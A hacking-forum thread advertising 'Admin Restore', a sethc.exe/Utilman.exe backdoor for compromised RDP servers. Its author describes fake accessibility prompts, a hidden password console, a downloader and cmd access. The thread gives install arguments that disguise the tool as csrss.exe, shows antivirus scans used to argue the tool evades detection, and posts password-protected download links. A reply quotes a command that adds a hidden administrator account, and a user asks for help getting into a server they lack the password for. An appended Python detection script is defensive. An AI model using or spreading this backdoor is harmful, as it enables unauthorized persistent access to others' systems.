Maximus

[RST] Admin Restore


[RST] Admin Restore v1.2

I made use of sethc.exe/Utilman.exe, only I use a different installation method... no "Take Ownership" or "File Overwrite" of any kind.

I created fake messages for High Contrast / Sticky Keys:

Windows Vista/Server 2008/Windows 7/Server 2008 R2 :

Desktop High Contrast

340381874.png

Desktop Sticky Keys

340384210.png

Winlogon Sticky Keys

340387338.png

Winlogon High Contrast

340391537.png

Windows XP/Windows Server 2003 :

Desktop High Contrast

340394991.png

Desktop Sticky Keys

340395478.png

Winlogon Sticky Keys

34039661.png

Winlogon High Contrast

340397207.png

How is it used?

At WinLogon we press SHIFT 5x or ALT (Left) + SHIFT (Left) + PRINT SCREEN, and one of the messages above will appear ... we press Ok/Cancel/Yes/No, after which we press TAB + SHIFT + ALT + CONTROL + DEL (they do not need to be pressed simultaneously) and the login console will appear:

340402585.png

Yes, as you can see I use a "NumPad", numbers only, because in v1.0 & v1.1 (although I did not publish them) on RDPs in Iran I would press Y, for example, and Z would be typed in the textbox; the NumPad solved the problem.

If we press Login without typing anything the console will close, if we get the password wrong 5x the console will close, and if we type the correct password this will appear:

340406411.png

We have a Downloader that saves to %TEMP%, we can access the information after download through CMD.exe, a small Task Run to start cmd.exe and more .., we can change the settings of the fake messages ... and because I read the post by user sllrdp in the Market, actually user567, with

At the request of the programmer who sells this tool, to leave feedback....

My feedback is 100% positive, the program works exactly as in the presentation video.

the only flaw, if I could call it that ... is that you choose a pass when you buy the program

and you cannot change it afterwards.

I also added the option to change the password after installation ...

If we click on the RST banner a small "disclaimer" will appear:

340410707.png

and if we click on "RST ... Maximus Spide ... Center" an About will appear:

34041557.png

How is it installed?

First of all you must have Administrator rights on the RDP.

The installer looks like this:

340419190.png

Command Line Arguments (for iHack.exe, not for Install.exe):

iHack.exe -i -n:[exe file] -pwd:[numeric password] -h:[sethc.exe/Utilman.exe] -msg:[0/1 where 0=false and 1=true]

Ex : iHack.exe -i -n:csrss.exe -msg:1 -pwd:31337 -h:sethc.exe

iHack.exe -iHack will open the "disclaimer":

340410707.png

Install.exe also installs Msvbvm60.dll (it will copy Msvbvm60.dll into the directory where iHack.exe will be installed), because I ran into problems on some RDPs with Windows Server 2003 on them.

A picture from Winlogon (my laptop)

http://www.7image.ru/pics/0213/340439811.jpg

VIDEO :

SCAN :

File Info

Report Date: 18.02.2013 01:02:29

Link To Scan: http://elementscanner.net//?RE=85539f8891fd8e1dffac2263bebd5808

File Name: iHack.exe

File Size: 625664 bytes

MD5 Hash: beffce95e5afb14fc38260c07901507a

SHA1 Hash: 8e5bacba52013be8cdf4b4b3c0093e5e14eb1736

Status: Clean

Total Results: 0/35

AVG Free-Clean.

ArcaVir-Clean.

Avast 5-Clean.

AntiVir (Avira)-Clean.

BitDefender-Clean.

VirusBuster Internet Security-Clean.

Clam Antivirus-Clean.

COMODO Internet Security-Clean.

Dr.Web-Clean.

eTrust-Vet-Clean.

F-PROT Antivirus-Clean.

F-Secure Internet Security-Clean.

G Data-Clean.

IKARUS Security-Clean.

Kaspersky Antivirus-Clean.

McAfee-Clean.

MS Security Essentials-Clean.

ESET NOD32-Clean.

Norman-Clean.

Norton Antivirus-Clean.

Panda Security-Clean.

A-Squared-Clean.

Quick Heal Antivirus-Clean.

Solo Antivirus-Clean.

Sophos-Clean.

Trend Micro Internet Security-Clean.

VBA32 Antivirus-Clean.

Vexira Antivirus-Clean.

Zoner AntiVirus-Clean.

Ad-Aware-Clean.

BullGuard-Clean.

Immunet Antivirus-Clean.

K7 Ultimate-Clean.

NANO Antivirus-Clean.

VIPRE-Clean.

File Info

Report Date: 17.02.2013 13:02:36

Link To Scan: Scan Result | Element Scanner

File Name: Install.exe

File Size: 219136 bytes

MD5 Hash: aa53152cc4c6567f28022d69aa95f51e

SHA1 Hash: 7f83f71aa8a72b2d8cb2ef41f32c0af700b97a29

Status: INFECTED

Total Results: 8/35

AVG Free-Clean.

ArcaVir-Clean.

Avast 5-Clean.

AntiVir (Avira)- TR/Crypt.ASPM.Gen.

BitDefender- Gen:Heur.ManBat.1.

VirusBuster Internet Security-Clean.

Clam Antivirus-Clean.

COMODO Internet Security-Clean.

Dr.Web-Clean.

eTrust-Vet-Clean.

F-PROT Antivirus-Clean.

F-Secure Internet Security- Gen:Heur.ManBat.1.

G Data- Gen:Heur.ManBat.1.

IKARUS Security- Virus.Win32.VBInject.

Kaspersky Antivirus-Clean.

McAfee-Clean.

MS Security Essentials-Clean.

ESET NOD32-Clean.

Norman-Clean.

Norton Antivirus-Clean.

Panda Security-Clean.

A-Squared- Virus.Win32.VBInject!IK.

Quick Heal Antivirus-Clean.

Solo Antivirus-Clean.

Sophos-Clean.

Trend Micro Internet Security-Clean.

VBA32 Antivirus-Clean.

Vexira Antivirus-Clean.

Zoner AntiVirus-Clean.

Ad-Aware-Clean.

BullGuard- Gen:Heur.ManBat.1.

Immunet Antivirus- Gen:Heur.ManBat.1.

K7 Ultimate-Clean.

NANO Antivirus-Clean.

VIPRE-Clean.

Download Link: https://www.dropbox.com/s/t0ilnhb9yzhixbh/Install.zip Password: rst

I hope you find it useful.

P.S. If you find bugs/errors please leave a comment or PM me, download https://www.dropbox.com/s/0hnq4f8q7r0ehsr/detect.exe and leave what is in the textbox here (it will detect the operating system). Thank you

P.S.2 For customized versions PM me.

@alinh0; I really believed it was about GetAdmin.exe, that exploit for Win Server 2003 (I think) .. I was thinking a new variant of the exploit had appeared, but you .... http://www.7image.ru/pics/0213/340464789.png :) in a trolling mood, kid ;))

@begood; I downloaded alinh0's program and ran it on XP in VMWARE, it was a troll, he probably didn't expect me to run it in a virtual machine. http://www.7image.ru/pics/0213/340464789.png "he has an exploit in C that opens a hidden cmd with net user RubberDuck mudbath /add && net localgroup 'admtors' RubberDuck /add" :)) he probably doesn't even know he got the command wrong ...

Update 2/18/2013 :

Command Line Arguments Bug Fixed (-msg:0/1 error)

"Permanent" link:

https://rstforums.com/proiecte/AdminRestore.zip

Edited by Nytro
  • Upvote 4
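
Detection logic for the artifacts the post above describes (the iHack.exe argument syntax, an install name such as csrss.exe passed with -n:, and the copy of Msvbvm60.dll placed beside the installed file), as an added example that is not part of the original post or of the tool. The event schema (`type`, `path`, `cmdline`), the rule names and the sample directories are constructed assumptions; only the command line in the first sample comes from the post.

```python
import ntpath
import re

# Argument syntax documented in the post: -h:<accessibility binary> plus -pwd:<digits>.
INSTALL_ARGS = re.compile(r"(?=.*-h:(?:sethc|utilman)\.exe)(?=.*-pwd:\d+)", re.IGNORECASE)
# Names worth protecting; csrss.exe is the post's own -n: example.
SYSTEM_NAMES = {"csrss.exe", "sethc.exe", "utilman.exe", "winlogon.exe"}
# Assumption: Windows is installed in the default C:\Windows location.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def findings(event):
    """Return the names of the rules that fire for one event (hypothetical schema)."""
    hits = []
    folder, name = ntpath.split(event.get("path", "").lower())
    if event["type"] == "process_create":
        if INSTALL_ARGS.search(event.get("cmdline", "")):
            hits.append("installer-arguments")
        if name in SYSTEM_NAMES and folder not in SYSTEM_DIRS:
            hits.append("system-name-outside-system32")
    elif event["type"] == "file_create":
        # Weak signal on its own: legitimate VB6 applications may also ship this DLL.
        if name == "msvbvm60.dll" and folder not in SYSTEM_DIRS:
            hits.append("vb6-runtime-side-copy")
    return hits


def triage(events):
    """Return (index, rules) for every event that triggers at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := findings(e))]


# Constructed sample events; the directories are placeholders, not paths from the post.
SAMPLE = [
    {"type": "process_create", "path": r"C:\Users\admin\Desktop\iHack.exe",
     "cmdline": "iHack.exe -i -n:csrss.exe -msg:1 -pwd:31337 -h:sethc.exe"},
    {"type": "file_create", "path": r"C:\ProgramData\example\Msvbvm60.dll"},
    {"type": "process_create", "path": r"C:\ProgramData\example\csrss.exe",
     "cmdline": "csrss.exe"},
    {"type": "process_create", "path": r"C:\Windows\System32\sethc.exe",
     "cmdline": "sethc.exe 211"},
]

if __name__ == "__main__":
    for index, rules in triage(SAMPLE):
        print(index, SAMPLE[index]["path"], rules)
```

The side-copy rule is only worth alerting on when it coincides with one of the other two on the same host.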

I have the following problem: I have a remote server with port 3389 open. I don't know the Administrator password, nor do I have access to do the installation on that 2008 server so that I then have access through shift keys etc.

whoever knows about this, please help me. right now I am trying passwords 6 to 12 characters long

can the exe be installed from outside? please help me!

I don't have linux to make an exploit.exe to send to the other party. Plus if I put the local ip 192,168,,,, I don't know if the listening will work, and the real ip has several local ones behind it

Edited by prenumele
works on win xp but not yet on 7
